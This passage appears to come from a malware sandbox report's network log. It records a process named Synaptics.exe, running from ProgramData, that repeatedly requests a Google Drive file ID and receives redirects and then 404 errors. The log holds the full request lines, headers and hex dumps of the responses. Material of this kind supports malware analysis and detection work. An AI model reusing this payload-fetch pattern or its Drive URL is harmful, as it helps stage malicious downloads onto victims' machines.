                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              15192.168.2.449763142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:35:59 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              16192.168.2.449767142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:35:59 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:36:00 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:35:59 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-BR7Bei7MLtEI0loKPFcGeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              17192.168.2.449766142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:35:59 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:36:00 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:35:59 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-SqKNftaYEdHjAoo_MosbcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              18192.168.2.449774142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:00 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:36:01 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:00 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce--ye_eze5qp74BkTFuswhyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              19192.168.2.449771142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:00 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:01 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC7nkfrw4zWMcA96Tm2wzc5eGnCtNu3sZ16X4Bd1ZXt9Gl4jIokiEUhGHFsdcrp95CJyfk2zrwQ
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:00 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-wIJHgNbWZcjf-u2dXguz-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:01 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:36:01 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 31 5f 38 32 46 4c 50 77 48 32 73 5f 6e 68 33 62 75 50 6c 43 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="i1_82FLPwH2s_nh3buPlCQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:36:01 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              20192.168.2.449772142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:00 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:36:01 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:00 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-UMhLl2EyMKRE1Y0kugbWYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              21192.168.2.449773142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:00 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:01 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC6AF2rbA8qRyXniCRcfQxq8LortFxpl5AlxvpxaR9J4fezOD7GC1KRpem5RxEwDlQV6
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:01 GMT
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-iyuykCa006bVWdFpk8ae4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:01 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:01 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 37 62 2d 4a 70 71 76 68 69 4b 66 57 65 69 69 56 43 6e 42 31 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="z7b-JpqvhiKfWeiiVCnB1Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:01 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              22192.168.2.449776142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:01 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:36:02 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:01 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-E9PcykpmpvyCSnUU0w_XzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              23192.168.2.449777142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:01 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:36:02 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:01 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-nxkiwjyQ2_xFOHgKjvPY3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              24192.168.2.449778142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:01 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:02 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC69YjcDJuuU8XKAgOHzCeMMuLA1mPS4ll3Cwa_S-PSxqmPUL8gQEevowSyP5qbj3w_H
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:01 GMT
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-BY7XwNwPutxwVpZNLu7yQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:02 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
